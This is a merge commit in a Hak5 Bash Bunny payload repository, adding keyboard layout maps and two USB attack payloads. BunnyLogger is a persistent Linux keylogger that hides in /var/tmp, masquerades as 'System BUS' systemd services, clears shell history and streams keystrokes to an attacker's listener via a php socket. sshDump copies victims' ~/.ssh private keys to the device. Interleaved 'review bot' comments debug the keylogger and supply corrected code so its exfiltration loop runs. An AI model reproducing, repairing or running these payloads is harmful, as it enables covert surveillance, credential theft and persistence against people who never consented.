Merge branch 'hak5:master' into master

0iphor13 2022-03-14 12:08:11 +01:00 committed by GitHub
commit bc281bcfdc
23 changed files with 1170 additions and 4 deletions


@ -6,14 +6,14 @@ This repository contains payloads and extensions for the Hak5 Bash Bunny. Commun
By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
- [Purchase at Hak5](https://hak5.org/products/bash-bunny "Purchase at Hak5") - [Purchase at Hak5](https://hak5.org/products/bash-bunny "Purchase at Hak5")
- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny "Documentation") - [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
- [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Forums") - [Bash Bunny Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
- Discord: [https://hak5.org/discord](https://hak5.org/discord) - Discord: [https://hak5.org/discord](https://hak5.org/discord)
![enter image description here](https://cdn.shopify.com/s/files/1/0068/2142/products/bash-bunny-mk2_001_c58d9658-b151-4328-af26-11eef3c47355_300x.jpg) ![enter image description here](https://cdn.shopify.com/s/files/1/0068/2142/products/bash-bunny-mk2_001_c58d9658-b151-4328-af26-11eef3c47355_300x.jpg)
## Documentation ## Documentation
Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny). Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/bash-bunny/) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny).
## Disclaimer ## Disclaimer
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution. Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.

languages/hu.json Normal file

@ -0,0 +1,187 @@
{
"__comment":"All numbers here are in hex format and 0x is ignored.",
"__comment":" ",
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
"__comment":" of document USB HID Usage Tables Version 1.12.",
"__comment":" ",
"__comment":"Definition of these 3 bytes can be found",
"__comment":" in section B.1 Protocol 1 (Keyboard)",
"__comment":" of document Device Class Definition for HID Version 1.11",
"__comment":" - byte 1: Modifier keys",
"__comment":" - byte 2: Reserved",
"__comment":" - byte 3: Keycode 1",
"__comment":" ",
"__comment":"Both documents can be obtained from link here",
"__comment":" http://www.usb.org/developers/hidpage/",
"__comment":" ",
"__comment":" Hungarian QWERTZ language made by Skeleton022",
"__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
"d":"00,00,07",
"e":"00,00,08",
"f":"00,00,09",
"g":"00,00,0a",
"h":"00,00,0b",
"i":"00,00,0c",
"j":"00,00,0d",
"k":"00,00,0e",
"l":"00,00,0f",
"m":"00,00,10",
"n":"00,00,11",
"o":"00,00,12",
"p":"00,00,13",
"q":"00,00,14",
"r":"00,00,15",
"s":"00,00,16",
"t":"00,00,17",
"u":"00,00,18",
"v":"00,00,19",
"w":"00,00,1a",
"x":"00,00,1b",
"z":"00,00,1c",
"y":"00,00,1d",
"1":"00,00,1e",
"2":"00,00,1f",
"3":"00,00,20",
"4":"00,00,21",
"5":"00,00,22",
"6":"00,00,23",
"7":"00,00,24",
"8":"00,00,25",
"9":"00,00,26",
"ö":"00,00,27",
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
"ü":"00,00,2d",
"ó":"00,00,2e",
"ő":"00,00,2f",
"ú":"00,00,30",
"ű":"00,00,31",
"é":"00,00,33",
"á":"00,00,34",
"0":"00,00,35",
",":"00,00,36",
".":"00,00,37",
"-":"00,00,38",
"CAPSLOCK":"00,00,39",
"F1":"00,00,3a",
"F2":"00,00,3b",
"F3":"00,00,3c",
"F4":"00,00,3d",
"F5":"00,00,3e",
"F6":"00,00,3f",
"F7":"00,00,40",
"F8":"00,00,41",
"F9":"00,00,42",
"F10":"00,00,43",
"F11":"00,00,44",
"F12":"00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK":"00,00,47",
"BREAK":"00,00,48",
"PAUSE":"00,00,48",
"INSERT":"00,00,49",
"HOME":"00,00,4a",
"PAGEUP":"00,00,4b",
"DEL":"00,00,4c",
"DELETE":"00,00,4c",
"END":"00,00,4d",
"PAGEDOWN":"00,00,4e",
"RIGHT":"00,00,4f",
"RIGHTARROW":"00,00,4f",
"LEFT":"00,00,50",
"LEFTARROW":"00,00,50",
"DOWN":"00,00,51",
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"í":"00,00,64",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
"A":"02,00,04",
"B":"02,00,05",
"C":"02,00,06",
"D":"02,00,07",
"E":"02,00,08",
"F":"02,00,09",
"G":"02,00,0a",
"H":"02,00,0b",
"I":"02,00,0c",
"J":"02,00,0d",
"K":"02,00,0e",
"L":"02,00,0f",
"M":"02,00,10",
"N":"02,00,11",
"O":"02,00,12",
"P":"02,00,13",
"Q":"02,00,14",
"R":"02,00,15",
"S":"02,00,16",
"T":"02,00,17",
"U":"02,00,18",
"V":"02,00,19",
"W":"02,00,1a",
"X":"02,00,1b",
"Z":"02,00,1c",
"Y":"02,00,1d",
"'":"02,00,1e",
"\"":"02,00,1f",
"+":"02,00,20",
"!":"02,00,21",
"%":"02,00,22",
"/":"02,00,23",
"=":"02,00,24",
"(":"02,00,25",
")":"02,00,26",
"Ö":"02,00,27",
"Ü":"02,00,2d",
"Ó":"02,00,2e",
"Ő":"02,00,2f",
"Ú":"02,00,30",
"Ű":"02,00,31",
"É":"02,00,33",
"Á":"02,00,34",
"?":"02,00,36",
":":"02,00,37",
"_":"02,00,38",
"Í":"02,00,64",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00",
"{":"40,00,05",
"&":"40,00,06",
"[":"40,00,09",
"]":"40,00,0a",
"}":"40,00,11",
"\\":"40,00,14",
"@":"40,00,19",
"|":"40,00,1a",
"#":"40,00,1b",
">":"40,00,1d",
"~":"40,00,1e",
"^":"40,00,20",
"`":"40,00,24",
"$":"40,00,33",
";":"40,00,36",
"*":"40,00,38",
"<":"40,00,64"
}
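Review bot: `"ALT-TAB":"00,00,71"` sends HID usage 0x71 (F22) with no modifier at all, whereas jp.json and tr.json in this same commit encode the combination as `"ALT-TAB":"04,00,2b"` (Alt held, Tab pressed); the Hungarian table should carry the same value. The four Mac combinations near the end all use modifier byte `12` (Right-Ctrl + Left-Shift) and the last key name has a stray apostrophe (`COMMAND-OPTION-SHIFT'`), while the sibling files use `COMMAND-CTRL` `09`, `COMMAND-CTRL-SHIFT` `0B`, `COMMAND-OPTION` `0C` and `COMMAND-OPTION-SHIFT` `0E`. `BACKSPACE` (usage 0x2a) is also missing, so any payload that relies on it will not type on a Hungarian host; `"BACKSPACE":"00,00,2a"` belongs between `ESCAPE` and `TAB`.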

languages/jp.json Normal file

@ -0,0 +1,172 @@
{
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"CTRL-ALT": "05,00,00",
"CTRL-SHIFT": "03,00,00",
"ALT-SHIFT": "06,00,00",
"__comment": "Below 5 key combinations are for Mac OSX",
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
"COMMAND": "08,00,00",
"COMMAND-CTRL": "09,00,00",
"COMMAND-CTRL-SHIFT": "0B,00,00",
"COMMAND-OPTION": "0C,00,00",
"COMMAND-OPTION-SHIFT": "0E,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,0c",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"1": "00,00,1e",
"!": "02,00,1e",
"2": "00,00,1f",
"\"": "02,00,1f",
"3": "00,00,20",
"#": "02,00,20",
"4": "00,00,21",
"$": "02,00,21",
"5": "00,00,22",
"%": "02,00,22",
"6": "00,00,23",
"&": "02,00,23",
"7": "00,00,24",
"'": "02,00,24",
"8": "00,00,25",
"(": "02,00,25",
"9": "00,00,26",
")": "02,00,26",
"0": "00,00,27",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"ALT-TAB": "04,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,2d",
"=": "02,00,2d",
"^": "00,00,2e",
"~": "02,00,2e",
"@": "00,00,2f",
"`": "02,00,2f",
"[": "00,00,30",
"{": "02,00,30",
"\\": "00,00,31",
"|": "02,00,31",
"]": "00,00,32",
"}": "02,00,32",
";": "00,00,33",
"+": "02,00,33",
":": "00,00,34",
"*": "02,00,34",
",": "00,00,36",
"<": "02,00,36",
".": "00,00,37",
">": "02,00,37",
"/": "00,00,38",
"?": "02,00,38",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}
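Review bot: There is no `"_"` entry anywhere in this table, so a STRING containing an underscore (common in paths, variable names and PowerShell) cannot be typed on a Japanese host; on JIS keyboards the underscore is Shift on the International1 key (HID usage 0x87), i.e. `"_": "02,00,87"`, which should be confirmed on a real JIS host before merging. The assignment of `\` / `|` to usage 0x31 and `]` / `}` to 0x32 also looks worth checking: under the xkb `jp` layout usage 0x31 produces `]`, with `\`/`_` on 0x87 and `¥`/`|` on 0x89, so the backslash and pipe entries may type a bracket instead. A one-line `__comment` naming the OS and layout the table was verified against would save the next contributor this guesswork.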

languages/tr.json Normal file

@ -0,0 +1,173 @@
{
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"CTRL-ALT": "05,00,00",
"CTRL-SHIFT": "03,00,00",
"ALT-SHIFT": "06,00,00",
"__comment": "Below 5 key combinations are for Mac OSX",
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
"COMMAND": "08,00,00",
"COMMAND-CTRL": "09,00,00",
"COMMAND-CTRL-SHIFT": "0B,00,00",
"COMMAND-OPTION": "0C,00,00",
"COMMAND-OPTION-SHIFT": "0E,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,34",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"1": "00,00,1e",
"!": "02,00,1e",
"2": "00,00,1f",
"@": "40,00,14",
"3": "00,00,20",
"#": "40,00,20",
"4": "00,00,21",
"$": "40,00,21",
"5": "00,00,22",
"%": "02,00,22",
"6": "00,00,23",
"^": "02,00,20",
"7": "00,00,24",
"&": "02,00,23",
"8": "00,00,25",
"*": "00,00,2d",
"9": "00,00,26",
"(": "02,00,25",
"0": "00,00,27",
")": "02,00,26",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"ALT-TAB": "04,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,2e",
"_": "02,00,2e",
"=": "02,00,27",
"+": "02,00,21",
"[": "40,00,25",
"{": "40,00,24",
"]": "40,00,26",
"}": "40,00,27",
"\\": "40,00,2d",
"|": "40,00,2e",
";": "02,00,31",
":": "02,00,38",
"'": "02,00,1f",
"\"": "00,00,35",
"`": "40,00,31",
"~": "40,00,30",
",": "00,00,31",
"<": "40,00,35",
".": "00,00,38",
">": "40,00,1e",
"/": "02,00,24",
"?": "02,00,2d",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}


@ -0,0 +1,62 @@
## About:
* Title: BunnyLogger
* Description: Key logger which sends each and every key stroke of target remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
### Features:
* Live keystroke capturing.
* Detailed key logs.
* Persistent
* Autostart payload on boot.
### Workflow:
* Encoding payload and injecting on target's system.
* Checks whether internet is connected to the target system.
* If internet is connected then it sends raw keystrokes to attacker.
* Attacker processes raw keystrokes.
### Changes to be made in payload.sh:
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| xinput | /tools/ |
### Usage:
1. Encode payload.txt and inject into target's system.
2. Start netcat listner on attacking system:
* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
3. Process raw keystrokes using BunnyLoggerDecoder utility:
```
./bunnyLoggerDecoder
bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
Usage:
Decode captured log: [./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
Options:
-f Specify Log file.
-m Select Mode(normal|informative)
-o Specify Output file.
-h For this banner.
```
#### Support me if you like my work:
* https://twitter.com/drapl0n


@ -0,0 +1,50 @@
usage () {
echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]";
echo -e "\nOptions:"
echo -e "-f\tSpecify Log file."
echo -e "-m\tSelect Mode(normal|informative)"
echo -e "-o\tSpecify Output file."
echo -e "-h\tFor this banner."
}
while getopts o:m:f:h: flag
do
case "${flag}" in
o) output=$OPTARG ;;
m) mode=$OPTARG ;;
f) filename=$OPTARG ;;
h) help=$OPTARG ;;
*)
usage
exit 1
esac
done
if [ -z "$output" ] && [ -z "$filename" ]; then
usage
exit 1
fi
if [ -z "$filename" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
exit 1
fi
if [ -z "$output" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ -z "$mode" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" == "normal" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
exit 1
fi
if [ "$mode" == "informative" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
exit 1
fi
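Review bot: Both decode branches end with `exit 1`, so a successful run reports failure to anything that calls the script, and `h:` in the getopts string demands an argument for `-h`, so a bare `-h` only reaches `usage` by falling into the `*)` branch while `help=$OPTARG` is never used. `$filename` and `$output` are unquoted in both awk pipelines, so a log path containing a space breaks the decode. Note also that `xmodmap -pke` is executed on the analyst's machine, so keycodes are resolved against the analyst's layout rather than the target's; a target with a different keymap decodes to the wrong characters, which deserves a comment here and a caveat in the README. Folding the two branches into one if/else over a shared awk program fixes the first two points:
```shell
while getopts o:m:f:h flag
do
  case "${flag}" in
    o) output=$OPTARG ;;
    m) mode=$OPTARG ;;
    f) filename=$OPTARG ;;
    h) usage; exit 0 ;;
    *) usage; exit 1 ;;
  esac
done
# … unchanged: missing-option and mode validation …
# keycodes are resolved with the analyst's own xmodmap table, which must match the target's layout
decode='BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k[$NF] "]"}'
if [ "$mode" = "normal" ]; then
  awk "$decode" "$filename" | grep press | awk '{print $4}' > "$output"
else
  awk "$decode" "$filename" > "$output"
fi
exit 0
```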


@ -0,0 +1,24 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/tools/xinput /var/tmp/.system/
echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
chmod +x /var/tmp/.system/sys
chmod +x /var/tmp/.system/xinput
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
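Review bot: The `echo -e` that writes `systemBus` is broken as committed: the `"` immediately after `exec(` closes the surrounding double-quoted string, so the later `)` and `;` are parsed by the generating shell and the trailing `'` is never closed, and bash aborts on that line with a syntax error before any service unit is written. Even with the quotes repaired, `$?` inside `if [ $? -eq 0 ]` is expanded at generation time to the status of the preceding `chmod`, so the written loop tests `0 -eq 0` forever and connects regardless of the ping. A quoted heredoc writes the loop verbatim and removes the escaping problem entirely. Separately, `WantedBy=multi-user.target` in both user units is not a target the per-user manager knows, so `systemctl --user enable` creates a symlink nothing pulls in (`default.target` is the user-manager equivalent), and `start --now` is not a valid combination. Finally, the `xinput` copied from `/tools` is a prebuilt binary shipped in this commit with no source or checksum in the README, which a reviewer cannot verify.
```shell
# … unchanged: staging of xinput and the sys wrapper …
# quoted delimiter: nothing below is expanded when the file is written
cat > /var/tmp/.system/systemBus <<'EOF'
while :
do
	if ping -c 5 0.0.0.0 >/dev/null 2>&1; then
		php -r '$sock=fsockopen("0.0.0.0",4444);exec("/var/tmp/.system/sys <&3 >&3 2>&3");'
	fi
done
EOF
# … unchanged: unit files (with WantedBy=default.target), daemon-reload, enable --now …
```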


@ -0,0 +1,56 @@
# Title: BunnyLogger
# Description: Key logger which sends each and every key stroke of target remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH
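Review bot: Locating the Bunny by size with `lol='$(lsblk | grep 1.8G)'` is fragile: any other 1.8G device matches too, partition rows carry tree-drawing characters in the first column, `echo $lol` flattens several matching lines into one, and a wrong `$disk` makes every following `udisksctl`/`cp` step fail while the payload still lights FINISH. Matching on the volume label is deterministic; the MacOS_EICAR payload in this commit mounts the udisk as /Volumes/BashBunny, which suggests the label is `BashBunny` (confirm on the device): `Q STRING disk='$(lsblk -rno NAME,LABEL | grep -w BashBunny | cut -d" " -f1)'`, where `-r` gives raw output so the first field is always the bare device name. `Q CTRL-ALT t` only opens a terminal on desktops that bind that shortcut (GNOME and derivatives), which the Target line should state. The same discovery snippet is repeated verbatim in sshDump, intel and LinuxPreter; a shared extension would keep the four copies in sync.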



@ -0,0 +1,49 @@
# Title: sshDump
# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: GNU/Linux.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [Looting]
Q STRING cp -r '~/.ssh' '$mntt/loot/SSH'
Q ENTER
Q DELAY 2000
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH
